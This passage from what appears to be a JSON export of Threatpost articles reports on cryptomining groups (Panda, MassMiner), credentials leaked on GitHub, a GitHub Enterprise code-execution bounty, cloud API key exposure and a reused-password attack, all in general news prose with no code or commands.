far, researchers estimate that Panda has made away with more than $100,000 in Monero \u2013 and with attacks as recently as August 2019, the threat group isn\u2019t ceasing its activities anytime soon, they said.\n\n\u201cPanda\u2019s willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information,\u201d said Christopher Evans and David Liebenberg with [Cisco\u2019s Talos research team.](<https://blog.talosintelligence.com/2019/09/panda-evolution.html>)\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nResearchers first became aware of Panda in the summer of 2018 after they engaged in a widespread illicit mining campaign called \u201c[MassMiner](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>).\u201d During that campaign, the threat actor used MassScan, a legitimate port scanner, to sniff out various vulnerabilities in servers to exploit, including a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>)).\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/17155626/image4-300x275.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/17155626/image4.png>)\n\nThe threat group then would exploit the flaws and install malware, which would set about mining for Monero and hooking up with a crypto-wallet and mining pool.\n\nSince then, in 2019, researchers said that the threat group has constantly evolved to update its infrastructure, exploits and payloads.\n\n\u201cShortly thereafter [the 2018 campaign], we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers,\u201d researchers said. \u201cWe believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems.\u201d\n\nPanda has constantly changed the vulnerabilities that it targets over the past year. For instance, in January 2019, Talos researchers saw Panda exploiting a recently-disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942). And in June 2019, Panda began to target a newer WebLogic vulnerability (CVE-2019-2725) and leveraging an updated payload with new features to download a secondary miner payload.\n\nIn the most recent campaigns, including one which took place in August 2019, Panda began employing a different set of command-and-control (C2) servers as well as a new payload-hosting infrastructure.\n\nIn March 2019, for instance, researchers observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. And in August, researchers said they observed several attacker IPs, post-exploit, pulling down payloads from a newer URL and saving the file as \u201cBBBBB\u201d (a slight departure from previous behavior, when the file was saved under a random 20-character name). Panda would then execute the file via PowerShell.\n\nPanda has changed up its payload over the summer as well, so that it\u2019s initial payload now uses the Certutil command-line utility \u2013 which can be used to obtain certificate authority information and configure Certificate Services \u2013 to download the secondary miner payload.\n\nThough the threat actor has swapped up its payloads, targeting and infrastructure, very little of its TTPs [tactics, techniques and procures] are sophisticated, Cisco\u2019s Evans told Threatpost.\n\nFor instance, \u201cThey attempt to hide their miners using the exact same popular techniques we see with other groups,\u201d he told Threatpost. \u201cTheir infrastructure is predictable: I can usually peg a new Panda domain as soon as I see it in the data; they tend to just be iterations of each other. Their early infrastructure was registered using an email address that immediately allowed Dave to pivot into their social media in China. They attack the same honeypots day after day with the same payloads. They don\u2019t even bother to confirm their victims are running a vulnerable system before they deliver an exploit.\u201d\n\nBetween swapping up its tactics, domains and payloads, researchers said that Panda has now made more than $100,000 through illicit cryptomining \u2013 and moving forward, Panda remains an active threat that system administers should be wary of.\n\n\u201cThere are several ways to detect mining activity but let\u2019s focus on the simple solutions of patching and basic security controls,\u201d Evans told Threatpost. \u201cIf you\u2019re running a web-accessible WebLogic server that has hasn\u2019t been patched against vulnerabilities like CVE-2017-10271, it\u2019s likely they have at least targeted the system for exploitation if not actually dropped a miner on it\u2026 In addition, if you don\u2019t need it open to the Internet, take it off.\u201d\n\n_**Interested in the role of artificial intelligence in cybersecurity, for both offense and defense? Don\u2019t miss our free **_[_**Threatpost webinar**_](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)_**, AI and Cybersecurity: Tools, Strategy and Advice, with senior editor Tara Seals and a panel of experts. **__**[Click here to register.](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)**_\n", "cvss3": {}, "published": "2019-09-17T21:04:35", "type": "threatpost", "title": "Panda Threat Group Mines for Monero With Updated Payload, Targets", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "modified": "2019-09-17T21:04:35", "id": "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "href": "https://threatpost.com/panda-threat-group-mines-for-monero-with-updated-payload-targets/148419/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-04-25T05:49:59", "description": "Though it falls squarely into the trend of cryptominers setting their sights on the Monero virtual currency, the MassMiner malware family is adding its own special somethin\u2019-somethin\u2019 to the mix. It targets Windows servers with a variety of recent and well-known exploits \u2013 all within a single executable.\n\nIn fact, MassMiner uses a veritable cornucopia of attacks: The [EternalBlue](<https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/>) National Security Agency hacking tool ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)), which it uses to install DoublePulsar and the Gh0st RAT backdoor to establish persistence; an exploit for the well-known Apache Struts flaw that led to the Equifax breach ([CVE-2017-5638](<http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html>)); and an exploit for Oracle\u2019s WebLogic Java application server ([CVE-2017-10271](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>)). It also uses the SQLck tool to gain brute-force access to Microsoft SQL Servers, and it even incorporates a fork of MassScan, a legitimate tool that can scan the internet in under six minutes.\n\n\u201cIt surprised us how many different exploits and hacking tools it leverages,\u201d said AlienVault researchers Chris Doman and Fernando Martinez, who analyzed the code.\n\nThey added that the malware family comprises many different versions, but they all spread first within the local network of its initial host, before attempting to propagate across the wider internet.\n\nAs for the anatomy of the attack, compromised Microsoft SQL Servers are first subjected to scripts that install MassMiner and disable a number of important security features and anti-virus protections.\n\nOnce the malware has been installed, it sets about mining for Monero and hooking up with a crypto-wallet and mining pool; it also connects with its C2 server for updates, and configures itself to infect other machines on the network. Meanwhile, a short VisualBasic script is used to deploy the malware to compromised Apache Struts servers, and it moves laterally by replicating itself like a worm. MassScan meanwhile passes a list of both private and public IP ranges to scan during execution, to find fresh server targets out on the web that it can break into with the SQLck brute-force tool.\n\nSo far, the criminals behind the malware have been successful with this kitchen-sink approach: AlienVault in its [analysis](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>) identified two Monero wallets belonging to the attackers.\n\nThe success is unsurprising, according to Ruchika Mishra, director of products and solutions at Balbix.\n\n\u201cGiven [the workforce skills shortage], it\u2019s not hard to imagine a multi-pronged attack such as MassMiner bypassing security systems and staying under the radar with relative ease,\u201d Mishra said via email. \u201cWith the proliferation of coin-mining attacks in 2017 and 2018, I foresee continued innovation and a significant uptick in complexity as the barrier to entry for attackers lowers and iterations of successful exploits become more readily available on the Dark Web.\u201d\n\nWorryingly, other capabilities in the bad code suggest that MassMiner may have loftier goals than simply cryptomining. On the EternalBlue front, it uses the exploit to drop the [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) Windows kernel attack, which is a sophisticated memory-based payload that hooks onto x86 and 64-bit systems and allows an attacker to execute any raw shellcode payload they wish, giving them full control over the system.\n\nMassMiner also uses EternalBlue to install [Gh0st RAT](<https://threatpost.com/eternalblue-exploit-spreading-gh0st-rat-nitol/126052/>), a trojan backdoor for persistence that has targeted the Windows platform for years. It was once primarily a nation-state tool used in APT espionage attacks against government agencies, activists and other political targets, until the EternalBlue exploit was used to spread it in other contexts last year.\n\nIncidentally, this is not the only cryptomining malware to make use of the ShadowBrokers\u2019 [release](<https://threatpost.com/shadowbrokers-remain-an-enigma/127072/>) of a trove of NSA exploits. Last week, [a malware called PyRoMine](<https://threatpost.com/pyromine-uses-nsa-exploit-for-monero-mining-and-backdoors/131472/>) that uses the EternalRomance tool was found in the wild mining Monero. Like MassMiner, it has far-ranging and concerning capabilities: It sets up a hidden default account on the victimized machine with system administrator privileges, which can be used for re-infection and further attacks.\n\nThe multi-pronged approach may be unusual, but it showcases the increasingly complex task that businesses have in front of them when it comes to their security postures.\n\n\u201cThe enterprise attack surface is hyper-dimensional and constantly increasing with hundreds of attack vectors. Enterprises continue to struggle with not just mapping their attack surfaces, but also identifying which systems are easiest to attack and can be used as a launch point for a breach,\u201d said Mishra.\n", "cvss3": {}, "published": "2018-05-03T20:26:37", "type": "threatpost", "title": "MassMiner Takes a Kitchen-Sink Approach to Cryptomining", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0143", "CVE-2017-10271", "CVE-2017-5638"], "modified": "2018-05-03T20:26:37", "id": "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "href": "https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:47", "description": "An audit of the SSH keys associated with more than a million GitHub accounts shows that some users have weak, easily factorable keys and many more are using keys that are still vulnerable to the Debian OpenSSL bug disclosed seven years ago.\n\nThe public SSH keys that users associate with their GitHub account are visible to other users, a feature that enables users to share those keys with others. Last December researcher Ben Cox decided to collect as many of those keys as he could and see what he could find out about them. He began the project on Dec. 27 and by Jan. 9 he had collected more than 1.3 million SSH keys.\n\n\u201cI took a stab at this in 2013 but found that too many people didn\u2019t use GitHub in SSH mode and thus had no keys set. This time however (with a new program that used the events api) I found that the majority of active users had some SSH keys in there,\u201d Cox said in a blog [post](<https://blog.benjojo.co.uk/post/auditing-github-users-keys>) detailing the project.\n\nAfter collecting the keys, Cox began analyzing them. One of the things he looked at was the strength of the key, and he discovered that seven of the keys in his set were just 512 bits, and two others were 256 bits. Those key lengths are short enough to be in the range of factorization on many modern machines.\n\n\u201c512 bit keys have been known to be factorable in less than 3 days. The main example of this is the Texas Instruments calculator firmware signing key that was broken, allowing the modding community to upload any firmware that they wanted,\u201d Cox said.\n\n\u201cI tried on my own to make a 256 bit key and factor it, and the process took less than 25 minutes from having the public SSH key to the factoring of primes (on a subpar processer by today\u2019s standards, and then a few more minutes to transform those back into a SSH key that I could log into systems with. This risk isn\u2019t only real if someone had gathered together top of the line mathematicians or supercomputers worth of power, the 256 bit key I factored was factored on a i5-2400 in 25 mins.\u201d\n\nThe bigger issue, however, is that Cox found what he calls a \u201cvery large amount\u201d of SSH keys in the set that were vulnerable to the [Debian OpenSSL bug](<https://lists.debian.org/debian-security-announce/2008/msg00152.html>) from 2008. That vulnerability existed in certain versions of Debian and resulted from the fact that the OpenSSL random number generator included in those versions was predictable. That means that cryptographic keys generated with vulnerable versions could be guessable. The bug affected SSH keys, VPN keys, and DNSSEC keys, among others.\n\nCox compared the list of keys he had gleaned from GitHub to a list of keys affected by the Debian flaw and found that some of the accounts using vulnerable keys had access to some large and sensitive GitHub repositories. Some of those repositories include Yandex, the Russian search provider, Spotify, the cryptographic libraries for Python, and Python\u2019s core.\n\nCox disclosed the problem to GitHub in early March and the vulnerable keys were revoked on May 5. The other weak and low-quality keys he discovered were revoked on June 1.\n", "cvss3": {}, "published": "2015-06-03T07:37:04", "type": "threatpost", "title": "Audit of GitHub SSH Keys Finds Many Still Vulnerable to Old Debian Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-06-04T15:34:07", "id": "THREATPOST:9F1389C4D97BAD7FDE2519A42E4594E2", "href": "https://threatpost.com/audit-of-github-ssh-keys-finds-many-still-vulnerable-to-old-debian-bug/113117/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:25", "description": "Popular collaboration and communication firm Slack rushed to plugged a security hole in its platform Thursday that was leaking some of its users\u2019 private chats and files for anyone to access.\n\nSlack, a leading tool used by companies to communicate internally, was alerted by security firm Detectify Labs who discovered Slack users were unwittingly sharing sensitive company information on the dev site GitHub.\n\nGitHub, another popular service used by the developer community to collaborate on projects, was unknowingly hosting hundreds of Slack bots that contained API information (or Slack tokens) that unintentionally gave third parties access to private Slack networks and data stored on them.\n\nSlack bots are created by companies to be used on their private Slack platform. They can serve either silly or serious purposes. For example, a Slack bot could be programmed to reboot servers by a user who simply types the request \u201cSlack bot, please reboot server\u201d. Another Slack bot request might be \u201cWhat\u2019s the weather for tomorrow?\u201d\n\nOver the years, thousands of Slack bots have been created by companies to carry out these conversational instructions. Hundreds of those developers decided to share their Slack bot programming code on sites such as GitHub. The idea is, other developers might want to reuse a useful Slack bot or modify the code so the Slack bot can do something new.\n\n\u201cThese developers were proud of their creation. They wanted to share their hard work with the rest of the developer community,\u201d said Rickard Carlsson, CEO of Detectify in an interview with Threatpost.\n\nThat\u2019s where developers ran into trouble. Unbeknownst to the developers sharing their Slack bots with GitHub was the fact they were also uploading their company\u2019s unique API key or token inside the Slack bot code. That meant a third-party could remove the Slack token and use it to hack into the Slack account of the person who originally created it.\n\nWhen Detectify searched for Slack tokens left behind on GitHub it discovered that those tokens could be used to access chats, files and private message data shared among Slack developer teams.\n\nAffected, Carlsson told Threatpost, were tokens belonging to individual users but also Fortune 500 companies, payment providers, multiple internet service providers and health care providers. In one case, Detectify reported it stumbled upon everything from \u201crenowned advertising agencies that want to show what they are doing internally. University classes at some of the world\u2019s best-known schools. Newspapers sharing their bots as part of stories.\u201d\n\nIn a [blog post outlining its discovery](<https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/>) Thursday, Detectify wrote, \u201cIn the worst case scenario, these tokens can leak production database credentials, source code, files with passwords and highly sensitive information.\u201d Detectify said it discovered the flaw earlier this month.\n\nAt first, Slack acknowledged the problem, but reminded researchers at Detectify that it\u2019s the users\u2019 responsibility to not share tokens and remove them when they are no longer needed. Slack has since updated its positions on tokens, telling Detectify \u201cWe\u2019re proactively looking for tokens ourselves now, and reaching out to customers to let them know when we\u2019ve disabled tokens and where we found them. We\u2019ll deactivate these in the next batch.\u201d\n\nSlack\u2019s email sent to its customers explaining the situation can be read online [via Detectify\u2019s website](<https://labs.detectify.com/wp-content/uploads/2016/04/Screen-Shot-2016-04-28-at-14.53.38.png>). In it the company said it would seeking out tokens it believed companies did not want to share intentionally, and deactivating them. \u201cTo help protect your team\u2019s information, we\u2019re taking the precautionary step of permanently disabling the affected tokens on your behalf,\u201d it wrote.\n\nIn a separate statement made to press Slack stated: \u201cSlack is clear and specific that tokens should be treated just like passwords. We warn developers when they generate a token never to share it with other users or applications. Our customers\u2019 security is of paramount importance to us, and we will continue to improve our documentation and communications to ensure that this message is urgently expressed.\u201d\n\nDetectify\u2019s last piece of advice: \u201cNever commit credentials inside code. Ever.\u201d\n", "cvss3": {}, "published": "2016-04-30T07:25:42", "type": "threatpost", "title": "Slack Plugs Token Security Hole", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-05-03T13:46:42", "id": "THREATPOST:BE0A86BAF05C9501D981BE19F3BB40AC", "href": "https://threatpost.com/slack-plugs-token-security-hole/117750/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:57:28", "description": "The U.S. Army has released to open source an internal forensics analysis framework that the Army Research Lab has been using for some time.\n\nThe framework, known as Dshell, is a Python tool that runs on Linux and its designed to help analysts investigate compromises within their environments. The goal in open sourcing the framework is to encourage outside developers and analysts to develop and contribute their own modules, based on their experiences.\n\n\u201cOutside of government there are a wide variety of cyber threats that are similar to what we face here at ARL,\u201d William Glodek, Network Security branch chief at the Army Research Laboratory, said in a [statement](<http://www.army.mil/article/141734>).\n\n\u201cDshell can help facilitate the transition of knowledge and understanding to our partners in academia and industry who face the same problems.\u201d\n\nThe Dshell framework is available on [GitHub](<https://github.com/USArmyResearchLab/Dshell>), and Glodek said in his statement that he hopes that users in private industry and the academic community will find the framework useful and be able to contribute their own modules and help expand the framework\u2019s functionality.\n\n\u201cThe success of Dshell so far has been dependent on a limited group of motivated individuals within government. By next year it should be representative of a much larger group with much more diverse backgrounds to analyze cyber attacks that are common to us all,\u201d Glodek said.\n\nThe release of Dshell comes shortly after [Cisco released its own OpenSOC security analytics framework](<https://threatpost.com/cisco-releases-security-analytics-framework-to-open-source/109415>) on [GitHub](<https://opensoc.github.io/>) in November. That framework is designed specifically for large network environments and provides some anomaly detection and incident forensics capabilities.\n\n\u201cOpenSOC is a Big Data security analytics framework designed to consume and monitor network traffic and machine exhaust data of a data center. OpenSOC is extensible and is designed to work at a massive scale,\u201d the OpenSOC documentation says.\n", "cvss3": {}, "published": "2015-01-30T10:59:44", "type": "threatpost", "title": "Army Research Lab Releases Dshell Forensics Framework", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-02-03T21:08:15", "id": "THREATPOST:76BC692CF25A0009598D6BE4E626ABD9", "href": "https://threatpost.com/army-research-lab-releases-dshell-forensics-framework/110766/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:57:34", "description": "Free online code repositories such as GitHub provide a valuable collaboration service for enterprise developers. But it\u2019s also a trove of potentially sensitive company and project information that\u2019s likely to warrant attention from hackers.\n\nAn application security specialist from Berlin has developed a tool he hopes can keep companies a step ahead. [Gitrob](<http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/>) is an open source intelligence command-line tool that mines GitHub for files belonging to an organization and runs them against pre-determined patterns looking for potentially sensitive information that isn\u2019t meant for public consumption.\n\nIts developer Michael Henriksen, who does application security and code auditing for SoundCloud, says Gitrob starts off by using GitHub\u2019s public API to query a Github organization\u2019s list of public members.\n\n\u201cWhen the list of members is obtained, it queries GitHub again for each member that returns a list of their public repositories,\u201d Henriksen told Threatopst. \u201cThe contents of the repositories are never downloaded to the machine, it simply uses GitHub\u2019s API again to obtain a list of file names. When clicking on a file in the web interface to see its contents, it is fetched from GitHub\u2019s servers.\u201d\n\nHenriksen said he has built a number of Observers, which act as Gitrob plug-ins, that flag files matching certain patterns. Organization members, repositories and files are saved to a PostgreSQL database for analysis before a Sinatra webserver is started locally in order to serve a web app that presents the data for analysis, which must be conducted manually.\n\n\u201cAll the files are sent through these observers, one by one, and the observers can then decorate or make changes to the file\u2019s database record, before it is saved to the database,\u201d Henriksen said. \u201cRight now, Gitrob actually only contains one observer which will flag files that match [patterns of interesting files](<https://github.com/michenriksen/gitrob/blob/master/patterns.json>), but the design makes it easy to introduce new logic to look for other things. The patterns are built in to the tool itself.\u201d\n\nSecurity analysts inside an enterprise should feel at home using Gitrob, Henriksen said, but cautioned that the tool will point out a default set of potentially sensitive items. An analyst would have to manually comb through them to determine whether those files should be public.\n\n> OSINT #Gitrob mines GitHub for sensitive information that isn\u2019t meant for public consumption.\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fgitrob-combs-github-repositories-for-secret-company-data%2F110380%2F&text=OSINT+%23Gitrob+mines+GitHub+for+sensitive+information+that+isn%26%238217%3Bt+meant+for+public+consumption.>)\n\n\u201cA security team in an organization can use Gitrob to periodically scan their repositories for sensitive files that might be checked in,\u201d Henriksen said. \u201cThe current version is not really suitable to run in an automated fashion, so it would have to be run manually, but I am planning to change that in the future so that it can be run automatically and report to somewhere when new things are found.\u201d\n\nHenriksen said he tested Gitrob against a number of GitHub repositories belonging to companies of different sizes; he found a variety of information using Gitrob from username-password combinations, email addresses, internal system mappings and other information that could be used in phishing campaigns or other social engineering attacks. Henriksen said he notified affected organizations; most were appreciative he said.\n\n\u201cI am not aware of any tool that specifically targets GitHub organizations like Gitrob does,\u201d Henriksen said. \u201cPeople have been finding sensitive files with GitHub\u2019s search functionality for a while (kind of like Google dorks for Github), but I think Gitrob is the first tool that makes the task of finding sensitive files within an organization very easy.\u201d\n\nInstallation instructions and requirements can be found on [his Github page](<http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/>).\n\n[_Image courtesy othree._](<https://www.flickr.com/photos/othree/>)\n", "cvss3": {}, "published": "2015-01-13T12:55:07", "type": "threatpost", "title": "Gitrob Combs Github Repositories for Secret Company Data", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-01-16T13:26:31", "id": "THREATPOST:BFFC84BE9B4393A9F11FFBECEC203286", "href": "https://threatpost.com/gitrob-combs-github-repositories-for-secret-company-data/110380/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:53:56", "description": "GitHub recently awarded $18,000 to a researcher after he came across a bug in its GitHub Enterprise management console that could have resulted in remote code execution.\n\nThe company patched the vulnerability at the end of January, but news of the flaw didn\u2019t surface until this week when GitHub and Markus Fenske, a German independent pen-tester [disclosed it](<http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html>).\n\nGitHub Enterprise is an on-premises version of GitHub.com that can be used to deploy a GitHub service on their organization\u2019s local network. The vulnerability is a combination of two bugs, Fenske told Threatpost Thursday.\n\nOne problem stems from the fact that a static value was being used to cryptographically sign the Ruby on Rails session secret for the console. The secret value is supposed to be a randomly generated per-machine value used to sign the cookie, not a static value.\n\nGitHub acknowledged on Tuesday that the static secret was only supposed to be used for testing and development, but \u201can unrelated change of file permissions prevented the intended (and randomly generated) session secret from being used.\u201d\n\n\u201cFor testing purposes they replaced it with a static value and forgot to change it back,\u201d Fenske told Threatpost. In the production environment, there was a mechanism that should have replaced it with a random value. But it did not work.\u201d\n\nWhile GitHub shouldn\u2019t have been using a static secret to sign cookies that hold session data, the other problem, Fenske says, is that session data could be serialized with Marshal. [Marshal](<https://ruby-doc.org/core-2.2.2/Marshal.html>), a library that converts collections of Ruby objects into a byte stream, has a method, .load, that can return the result of converted serialized data.\n\nAs Fenske points out, [documentation](<https://ruby-doc.org/core-2.2.0/Marshal.html#method-c-load>) around Marshal.load says to \u201cnever pass untrusted data (including user supplied input) to this method,\u201d but that\u2019s what GitHub was doing.\n\nBy knowing the secret, an attacker could have forged a cookie, deserialized by Marshal.load, and tricked GitHub into running whatever code they wanted.\n\n\u201cBecause the secret is known, you can create a valid signature and pass arbitrary data to Marshal.load, which then leads to remote code execution,\u201d Fenske said.\n\nFenske says that while he sells sugar wax for hair removal by day\u2013[seriously](<https://www.bodypil.de/ueber-uns.html>)\u2013he hacks stuff by night. He founded an IT security consulting firm, Exablue, last month which he plans to use to carry out audits, pen-testing, and \u201cthe whole range\u201d going forward. He said he was inspired to poke around GitHub Enterprise after he stumbled upon a blogpost by Taiwanese hacker Orange Tsai about [a SQL injection](<http://blog.orange.tw/2017/01/bug-bounty-github-enterprise-sql-injection.html>) he found in the platform.\n\n\u201cAbout two minutes after decoding the source and opening the first file (config.ru) of the first application (the management interface), I noticed the vulnerability,\u201d Fenske said.\n\nGitHub fixed the vulnerability on Jan. 31 when it pushed out GitHub Enterprise 2.8.7. Now the service defaults to a randomly generated session secret if the initially configured session secret is not found.\n\nIt was a fairly quick turnaround for the company; the patch came only five days after Fenske reported the issue and earned him $10,000, the highest reward the company gives out through its bug bounty program, and [a spot in its Hall of Fame](<https://bounty.github.com/researchers/iblue.html>).\n\n\u200b\u201dWorking with GitHub is really nice,\u201d Fenske said, \u201cFor a company that big, their speed is amazing.\u201d\n\nThe researcher had no idea when he submitted the bug, however, that the company was in the middle of a promotional bug bounty period. The company [announced the promotion](<https://github.com/blog/2302-bug-bounty-anniversary-promotion-bigger-bounties-in-january-and-february>), which stretched from January to February, to celebrate the third anniversary of its [bug bounty program](<https://bounty.github.com/#rules>) with HackerOne.\n\nAfter he sent a draft of his disclosure to the company this week, Fenske discovered his bug was severe enough to fetch an additional $8,000 bounty and [second place in the contest](<https://github.com/blog/2332-bug-bounty-third-anniversary-wrap-up>).\n\n\u201cI was just writing my article and sent GitHub a draft to look at, and the answer came within minutes, telling me that I can publish whatever I like and that they gave me more money,\u201dhe said, \u201cI did not know about that extra contest and was very pleasantly surprised.\u201d\n\nFenske\u2019s bug was one of three GitHub fixed in its Enterprise product to qualify for additional bug bounty money. The company also fixed two separate SAML authentication bypass bugs in the service.\n\nFenske said the latest release of GitHub Enterprise uses a secret that\u2019s 16 random bytes written in hex.\n\n\u201cI quickly calculated that cracking it will take about 469142742208 gigayears on a 8-GPU instance (for comparison: The Sun will be gone in 7.7 gigayears). I think it\u2019s secure now.\u201d\n", "cvss3": {}, "published": "2017-03-17T09:00:04", "type": "threatpost", "title": "GitHub Code Execution Bug Fetches $18,000 Bounty", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2017-03-16T23:38:35", "id": "THREATPOST:E984089A4842B564B374B807AF915A44", "href": "https://threatpost.com/github-code-execution-bug-fetches-18000-bounty/124378/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:19", "description": "When it comes to cloud computing, APIs more or less drive everything, but in the eyes of some researchers, existing security controls around them haven\u2019t kept pace.\n\nWhile individual components of a system can be secure, when that system gets deployed in the cloud it can often become insecure \u2013 and get worse at scale, according to Erik Peterson, a cloud technology researcher with Veracode. Peterson, who also refers to himself as a Cloud Security Weapons Manufacturer, described the \u2018Emergent Insecurity\u2019 of the cloud in a talk Wednesday at the Source Conference in Boston.\n\nEarly on in his presentation, Peterson recounted a [Chris Hoff](<https://twitter.com/Beaker>) quote that he claims sums up the concept: \u201cIf your security sucks now, you\u2019ll be pleasantly surprised by the lack of change when you move to cloud.\u201d\n\nIn particular Peterson warned about the dangers associated with API credential exposure, something which could easily lead to apps being rigged to spread malware, cloud infrastructure adapted for use in a Bitcoin mining operation, additional attacks being launched, and the most critical: the downloading of sensitive customer data.\n\n\u201cAPI access is the new equivalent to physical access,\u201d Peterson said, \u201cIf someone compromises your most sensitive API credential, it doesn\u2019t matter.\u201d\n\nAPI keys, which protect cloud metadata \u2013 information that usually includes Amazon Web Services (AWS) access credentials, and startup scripts \u2013 can often be the only thing standing between users and total compromise, he stressed.\n\nPeterson, who\u2019s researched cloud and architect solutions in AWS since 2009, warned that old, vintage software vulnerabilities can easily be leveraged for compromise.\n\nHe\u2019s seen it all: Server-side request forgery vulnerabilities, XML external entity vulnerabilities, command injection vulnerabilities, unintended proxy or intermediary vulnerabilities. Each one can lead to the unintended exposure of metadata, but when they all come together, it can result in a full stack hack, or what Peterson likens to \u201cdeath by 1,000 cuts.\u201d\n\nFor instance, he claims, if an attacker gained access to an API key they could escalate privileges. If they gained access to cloud DNS, it could reveal the private IP of the web server. If an attacker got access to an IP address, they could uncover an app that hasn\u2019t been tested. Once in, it\u2019s possible an attacker could do the worst, Peterson claims, clone the database for quiet extraction.\n\n\u201cLots of people are shuffling cloud data and not thinking of the flaws,\u201d Peterson said, \u201cthey all lead to exposing that user data, all that great info my system needs to startup.\u201d\n\nThere are ways to prevent a full stack hack, mainly through encryption, but common sense doesn\u2019t hurt either.\n\n\u201cNo more checking your API keys into GitHub,\u201d Peterson advised.\n\nAttackers often scour the service looking to exploit vulnerabilities and access cloud metadata API. Storing sensitive information like API keys there can be a quick lesson in futility. That still doesn\u2019t stop users from doing it though; a cursory search on the service for \u201cSECRET_ACCESS_KEY\u201d last year yielded 7,500 placeholder results, Peterson said.\n\nOne developer discovered 140 servers running on his Amazon Web Services account [last year](<https://it.slashdot.org/story/15/01/02/2342228/bots-scanning-github-to-steal-amazon-ec2-keys>) after a bot scanning GitHub sniffed out his Amazon Elastic Compute Cloud (EC2) keys.\n\nDevelopers should get off the old EC2 classic and lockdown their Simple Storage Service (S3) buckets, Peterson said Wednesday. If they aren\u2019t already, developers should log everything, especially API activity, he said, adding that some AWS tools, like [Cloudtrail](<https://aws.amazon.com/cloudtrail/>), which records AWS API calls, and [Netflix\u2019s Security Monkey](<https://threatpost.com/netflix-open-source-security-tools-solve-range-of-challenges/107931/>), which can be used to monitor and analyze AWS configurations, can be invaluable.\n\nInstead of trying to control change, developers should react to change, rethink their threat model and realize that lower priority software vulnerabilities, like SSRF, or XXE, can still be deadly, Peterson said.\n\n\u201cIf you have a key that an app is using ask yourself: What\u2019s the worst thing that could happen if it was compromised?\u201d Peterson asked aloud, \u201cIs there a path that leads to my entire environment getting deleted by some unknown entity?\u201d\n", "cvss3": {}, "published": "2016-05-19T14:20:22", "type": "threatpost", "title": "Protecting Cloud APIs Critical to Mitigating Total Compromise", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-05-19T18:20:22", "id": "THREATPOST:08BA9FD6E2245EA011F6C29F24929679", "href": "https://threatpost.com/protecting-cloud-apis-critical-to-mitigating-total-compromise/118197/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:11", "description": "Github is forcing a password reset on some of its users after it detected a number of successful intrusions into its repositories using credentials compromised in other breaches.\n\n\u201cThis appears to be the result of an attacker using lists of email addresses and passwords from other online services that have been compromised in the past, and trying them on GitHub accounts,\u201d GitHub said in an [advisory](<https://github.com/blog/2190-github-security-update-reused-password-attack>) published Thursday by Shawn Davenport, GitHub VP of security. \u201cWe immediately began investigating, and found that the attacker had been able to log in to a number of GitHub accounts.\u201d\n\nGitHub said it detected late Tuesday unauthorized attempts against a large number of GitHub accounts. It stressed that GitHub itself has not been compromised.\n\nIt warns users that in addition to the exposed credentials, some personal information may have been exposed as well as lists of accessible repositories and organizations.\n\n\u201cIf your account was impacted, we are in the process of contacting you directly with information about how to reset your password and restore access to your account,\u201d GitHub said.\n\nThe source of credentials used to attack GitHub accounts is unknown. ~~A request for comment 